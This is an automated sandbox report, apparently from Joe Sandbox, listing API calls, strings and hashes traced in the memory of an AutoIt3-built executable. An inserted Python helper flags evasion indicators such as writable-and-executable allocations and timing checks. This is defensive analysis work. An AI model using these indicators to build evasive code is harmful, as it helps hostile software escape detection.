                                                    • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 00418682
                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 00418689
                                                     • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,00000000,00000000,?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 0041869F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 1f5315ac0bb294c872a05009acc523af1921f69f6559729c080259344d191cff
                                                    • Instruction ID: 174cbcf52dc33057f7284e4c8dce90f6b99a8024995d9109c99ec6977db46663
                                                    • Opcode Fuzzy Hash: 1f5315ac0bb294c872a05009acc523af1921f69f6559729c080259344d191cff
                                                    • Instruction Fuzzy Hash: 30F0C275200204BFEB211FA9EC88EBB3FACFF86754B00013AF448C2150CB218954CA38
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 2afe406052f7497f49198dd55e8e2d9c1239825e6d12a0b0f59b004ac193da47
                                                    • Instruction ID: 5bc45344a93d436e76bca392f186b32cd2ebb2a0d9242e83a79ac129c9766402
                                                    • Opcode Fuzzy Hash: 2afe406052f7497f49198dd55e8e2d9c1239825e6d12a0b0f59b004ac193da47
                                                    • Instruction Fuzzy Hash: B101D634540304ABEB215B60ED8EFE77B78FF02746F00056AF156A04E0DBF569998F58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EndPath.GDI32(?), ref: 003C13BF
                                                    • StrokeAndFillPath.GDI32(?,?,003FBAD8,00000000,?), ref: 003C13DB
                                                    • SelectObject.GDI32(?,00000000), ref: 003C13EE
                                                    • DeleteObject.GDI32 ref: 003C1401
                                                    • StrokePath.GDI32(?), ref: 003C141C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: 7b1bc675866767fad31362077faca09945b4e0524152a8fa21092a0b5efad4cd
                                                    • Instruction ID: 774e583c939b6c89e7c89523a1f053e839d594d82b99d05e31925ad89edbbebe
                                                    • Opcode Fuzzy Hash: 7b1bc675866767fad31362077faca09945b4e0524152a8fa21092a0b5efad4cd
                                                    • Instruction Fuzzy Hash: AFF0CD34001248EBDB666F56EC0CB583FA4AB42366F158A39E429844F2D7324995DF58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 0043E3D2
                                                    • CharLowerBuffW.USER32(?,?), ref: 0043E415
                                                      • Part of subcall function 0043DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0043DAD9
                                                    • VirtualAlloc.KERNEL32(00000000,UT]]H,00003000,00000040), ref: 0043E615
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual
                                                    • String ID: UT]]H
                                                    • API String ID: 3213863441-3063877160
                                                    • Opcode ID: 80f8c7a8374459266b4d76d1705de75570fe78b0551f3e9ee37b6bff65075159
                                                    • Instruction ID: c00191987ce055ce4ea4e5b0605133fafcfd2b875836307ced00bd807539d588
                                                    • Opcode Fuzzy Hash: 80f8c7a8374459266b4d76d1705de75570fe78b0551f3e9ee37b6bff65075159
                                                    • Instruction Fuzzy Hash: E6C176716083119FC705DF29C480A6ABBE4FF88718F14896EF8999B391D734ED46CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
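
The per-function API lists above (the QueryPerformanceCounter/Sleep loop at 00425502, the two GetTokenInformation helpers at 00418608 and 00418669, and the VirtualAlloc call at 0043E615 whose last argument 00000040 is PAGE_EXECUTE_READWRITE) are quicker to triage once the hex constants are decoded and the interesting combinations are flagged. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not Joe Sandbox code. Its input is constructed from lines shaped like the report's "APIs" entries, the constant tables are taken from winnt.h (where TOKEN_INFORMATION_CLASS value 3 is TokenPrivileges and TokenIntegrityLevel is 25), and the finding rules (writable-and-executable allocation, timing measurement around Sleep, token class lookup) are the editor's own heuristics, not the sandbox's signatures.

```python
"""Triage helper for the per-function "APIs" lists of a Joe Sandbox report (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

# Constructed input in the shape of the report's "APIs" sections: three functions,
# a timing loop, an RWX allocation and a token query. Not copied from a real report.
SAMPLE_REPORT = """\
APIs
• QueryPerformanceCounter.KERNEL32(00000000,00000000,?,?), ref: 00425502
• QueryPerformanceFrequency.KERNEL32(00000000,?,?), ref: 00425510
• Sleep.KERNEL32(00000000,?,?), ref: 00425518
Memory Dump Source
APIs
• CharLowerBuffW.USER32(?,?), ref: 0043E3D2
  • Part of subcall function 0043DAB9: CharLowerBuffW.USER32(?,?), ref: 0043DAD9
• VirtualAlloc.KERNEL32(00000000,UT]]H,00003000,00000040), ref: 0043E615
• DeleteObject.GDI32 ref: 003C1401
Memory Dump Source
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000), ref: 00418669
• GetLastError.KERNEL32(?,?), ref: 00418673
Memory Dump Source
"""

# One "• Api.MODULE(args), ref: ADDR" line; the argument list is optional (see DeleteObject).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# 8 hex digits, optionally followed by the decoder's "(Name)" annotation.
ARG_RE = re.compile(r"^([0-9A-Fa-f]{8})(?:\([^)]*\))?$")

# Constants from winnt.h (partial tables, enough for these records).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x400000: "MEM_TOP_DOWN"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
WRITABLE_EXECUTABLE = {0x40, 0x80}
TOKEN_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 8: "TokenType",
               18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel"}


@dataclass
class Call:
    api: str
    module: str
    args: List[Union[int, str, None]]
    ref: str


def parse_arg(raw: str) -> Union[int, str, None]:
    """'?' -> None, 8-digit hex (with or without annotation) -> int, anything else raw.
    A genuine 8-character hex-looking string argument would be misread as a number."""
    raw = raw.strip()
    if raw == "?":
        return None
    m = ARG_RE.match(raw)
    return int(m.group(1), 16) if m else raw


def parse_blocks(text: str) -> List[List[Call]]:
    """Split report text at each 'APIs' header into per-function lists of calls."""
    blocks: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue
        raw_args = m.group("args")
        # A plain split is enough for hex and '?' arguments; a string argument
        # containing a comma would need a quote-aware splitter.
        args = [parse_arg(a) for a in raw_args.split(",")] if raw_args else []
        current.append(Call(m.group("api"), m.group("module"), args, m.group("ref").upper()))
    return blocks


def decode_flags(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def triage(blocks: List[List[Call]]) -> List[Tuple[str, str]]:
    """Return (ref, finding) pairs for the combinations a reviewer looks at first."""
    findings: List[Tuple[str, str]] = []
    for calls in blocks:
        names = {c.api for c in calls}
        if {"QueryPerformanceCounter", "Sleep"} <= names:
            ref = next(c.ref for c in calls if c.api == "Sleep")
            findings.append((ref, "timing check: QueryPerformanceCounter around Sleep"))
        for c in calls:
            if c.api == "VirtualAlloc" and len(c.args) >= 4 and isinstance(c.args[3], int):
                alloc = decode_flags(c.args[2], MEM_FLAGS) if isinstance(c.args[2], int) else "?"
                prot = c.args[3]
                if prot in WRITABLE_EXECUTABLE:
                    findings.append((c.ref, f"RWX allocation: VirtualAlloc {alloc} {PAGE_PROT[prot]}"))
            elif c.api == "GetTokenInformation" and len(c.args) >= 2 and isinstance(c.args[1], int):
                cls = c.args[1]
                findings.append((c.ref, f"token query: class {cls} = {TOKEN_CLASS.get(cls, 'unknown')}"))
    return findings


if __name__ == "__main__":
    for ref, finding in triage(parse_blocks(SAMPLE_REPORT)):
        print(ref, finding)
```

Run it on the report text exported from the browser to get one line per flagged function; a decoder annotation such as "(TokenIntegrityLevel)" is stripped and the numeric class is looked up again, so a mislabelled parameter does not propagate into the triage output.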

                                                    APIs
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                    • CoInitialize.OLE32(00000000), ref: 0042BC26
                                                    • CoCreateInstance.OLE32(00452D6C,00000000,00000001,00452BDC,?), ref: 0042BC3F
                                                    • CoUninitialize.OLE32 ref: 0042BC5C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                    • String ID: .lnk
                                                    • API String ID: 3769357847-24824748
                                                    • Opcode ID: 29635d781ddb806873d756fa5471ed4fe90ae55afbbdf098272f557231f18972
                                                    • Instruction ID: 9f5c0bde8110a2a1cc6979febc5e9a17e6c3037530ed28f65eb98081d51b6bcc
                                                    • Opcode Fuzzy Hash: 29635d781ddb806873d756fa5471ed4fe90ae55afbbdf098272f557231f18972
                                                    • Instruction Fuzzy Hash: 0CA141752042119FCB01EF14C884E6ABBE5FF88314F15899EF8999B3A2CB35ED45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • OleSetContainedObject.OLE32(0000000C,00000001), ref: 0041B981
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container$%E
                                                    • API String ID: 3565006973-4107763017
                                                    • Opcode ID: 4b3e28f37fa26ecac71ec361d0ea7ea51287a70bbabd9eff5dbb0212c920893f
                                                    • Instruction ID: 7f7c9d6e3ffd5a4d41e5e2118b9eb9e88712bd4dcef7027e3c468bed7c7f37e6
                                                    • Opcode Fuzzy Hash: 4b3e28f37fa26ecac71ec361d0ea7ea51287a70bbabd9eff5dbb0212c920893f
                                                    • Instruction Fuzzy Hash: 7F914D71610201AFDB14DF64C885AA7BBF8FF49710F20856EF949CB291DB75E881CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000), ref: 00417C32
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,?,00000000), ref: 00417C4A
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0044FB80,000000FF,?,?,00000000), ref: 00417C6F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FromProg$FreeTask
                                                    • String ID: ,,E
                                                    • API String ID: 3873279438-4052858919
                                                    • Opcode ID: bedc14f1928216ad45debf16ed415ef5e21af7422edadb3a355fbbc6dd191da6
                                                    • Instruction ID: f48a6b32d8e6fc896e298f0e10b2c2198cfc0b07b9cecdb04ac8267f1798e265
                                                    • Opcode Fuzzy Hash: bedc14f1928216ad45debf16ed415ef5e21af7422edadb3a355fbbc6dd191da6
                                                    • Instruction Fuzzy Hash: 30811972A04109EFCB04DF94C988DEEB7B9FF89315F204199F506AB250DB75AE46CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,?,?), ref: 004230A6
                                                    • SetMenuItemInfoW.USER32 ref: 00423159
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00423187
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default
                                                    • String ID: 0
                                                    • API String ID: 1306138088-4108050209
                                                    • Opcode ID: 74b86a681a5ebdc566d1b90d63aeceb2fc14d1ccb0057a28fb1a0cba20bc040d
                                                    • Instruction ID: 527b35f0b794cd8f59b2f977387b242d661db4889c9ef72d9ff73fbd6a26d047
                                                    • Opcode Fuzzy Hash: 74b86a681a5ebdc566d1b90d63aeceb2fc14d1ccb0057a28fb1a0cba20bc040d
                                                    • Instruction Fuzzy Hash: C5510431608320AAD715AF24E844A7B7BF4EF45321F440A2FF881D22D1DB7CCE54876A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00422CCB
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00422D11
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00486890,00000000), ref: 00422D5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    • API String ID: 135850232-4108050209
                                                    • Opcode ID: 29ce1aa7980ab6ea33e72ccdc4c9a4b46aa7f6ed33f9d6c96fa524a25e192f29
                                                    • Instruction ID: 279e7887c3572e7c5d479318c7dcb8aa40c9cb90566e9380734fc529004d9186
                                                    • Opcode Fuzzy Hash: 29ce1aa7980ab6ea33e72ccdc4c9a4b46aa7f6ed33f9d6c96fa524a25e192f29
                                                    • Instruction Fuzzy Hash: E241CE31204312BFD720DF24E944F57BBA8EF85324F10462EF961972A1D7B4E905CBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004253E8,?), ref: 004248C7
                                                      • Part of subcall function 004248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004253E8,?), ref: 004248E0
                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,0042A7D7,00000000), ref: 004238F3
                                                    • MoveFileW.KERNEL32(?,?), ref: 00423927
                                                    • SHFileOperationW.SHELL32(?), ref: 004239DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 67141772-1173974218
                                                    • Opcode ID: 3a8647b4ba4b052e34a8f20f31b7d79727d580e501647124e6217f0507e1d33e
                                                    • Instruction ID: b0976e4ddaded145abc340d9dec3dfdfab78172df6a679ce07ec4993aaba718b
                                                    • Opcode Fuzzy Hash: 3a8647b4ba4b052e34a8f20f31b7d79727d580e501647124e6217f0507e1d33e
                                                    • Instruction Fuzzy Hash: ED41A3B22083949AC752EF65E4419EBB7ECEF86341F40092FF085C7151EA79D288C716
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0044F910,00000000,?,?,?,?), ref: 00447C4E
                                                    • GetWindowLongW.USER32 ref: 00447C6B
                                                    • SetWindowLongW.USER32 ref: 00447C7B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: a8fc41af43921b88e43b338819339db72f0cefcefd6236c514ff0132de008a75
                                                    • Instruction ID: 9a97d52954ea64f08284ba3cac2371b8e5bdf578b0ad7df038588386efb3ee3a
                                                    • Opcode Fuzzy Hash: a8fc41af43921b88e43b338819339db72f0cefcefd6236c514ff0132de008a75
                                                    • Instruction Fuzzy Hash: B931B035204205AEEB119F34DC45BEB77A8EB05328F21872AF875E22E0C735A8569B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004476D0
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004476E4
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00447708
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: 34d260a80d784516541f7f59a063930000f29a057b282580bd5e5b8955109441
                                                    • Instruction ID: c38c1aef03c00f446d91b2aa806800d4285b89c730d66bc985034f68711a41f3
                                                    • Opcode Fuzzy Hash: 34d260a80d784516541f7f59a063930000f29a057b282580bd5e5b8955109441
                                                    • Instruction Fuzzy Hash: 0421D132600218BFEF158FA4CC46FEB3B79EF49764F110215FA156B1D0CBB5A8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00447EB9
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00447EC7
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00447ECE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: dab1f232757e4c889f70a9f32ecbe23c78bc210dff57e63306e2eabc4c708c98
                                                    • Instruction ID: 21b1692d7d02d2d5734d1764eb6435601b5eef8ceef2be61f21e1a00f7a247c2
                                                    • Opcode Fuzzy Hash: dab1f232757e4c889f70a9f32ecbe23c78bc210dff57e63306e2eabc4c708c98
                                                    • Instruction Fuzzy Hash: 982192B5604109AFEB01DF14CC81DBB37ECEF5A394B15095AF5049B361CB35EC128B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00446FAA
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00446FBA
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00446FDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 1c9abbcd5e9dd9086f0d73b52327c00f2bcec3bd6ef773bd2eb9a209c5b370c9
                                                    • Instruction ID: e4df0f6647173bf1609e135f241d959ec1101c3d19d28d2311ff41673a58c1db
                                                    • Opcode Fuzzy Hash: 1c9abbcd5e9dd9086f0d73b52327c00f2bcec3bd6ef773bd2eb9a209c5b370c9
                                                    • Instruction Fuzzy Hash: E521C232610118BFEF118F54DC85FBF3B6AEF8A764F028125F9449B190C6759C56CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0041A37C: SendMessageTimeoutW.USER32 ref: 0041A399
                                                      • Part of subcall function 0041A37C: GetWindowThreadProcessId.USER32(?,?), ref: 0041A3AC
                                                      • Part of subcall function 0041A37C: GetCurrentThreadId.KERNEL32 ref: 0041A3B3
                                                      • Part of subcall function 0041A37C: AttachThreadInput.USER32(00000000,?,0041A554,?,00000001,0044F910,?,00000001), ref: 0041A3BA
                                                    • GetFocus.USER32(?,00000001,0044F910,?,00000001), ref: 0041A554
                                                      • Part of subcall function 0041A3C5: GetParent.USER32(?), ref: 0041A3D3
                                                    • GetClassNameW.USER32 ref: 0041A59D
                                                    • EnumChildWindows.USER32 ref: 0041A5C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                    • String ID: %s%d
                                                    • API String ID: 2776554818-1110647743
                                                    • Opcode ID: 3037548b34176736f68bb970852b2978a76456e6dd11ea065ee4cfb503b827ab
                                                    • Instruction ID: a994fb5904acc18de9ce91c6bbc80047a69a58f74cb4f8545794af013614faba
                                                    • Opcode Fuzzy Hash: 3037548b34176736f68bb970852b2978a76456e6dd11ea065ee4cfb503b827ab
                                                    • Instruction Fuzzy Hash: F7216072101208BADB116BB1EC8AFFB376CEF45315F14407AF918AA092CA3959958B39
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0042AEBF
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0042AF13
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0044F910), ref: 0042AF6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
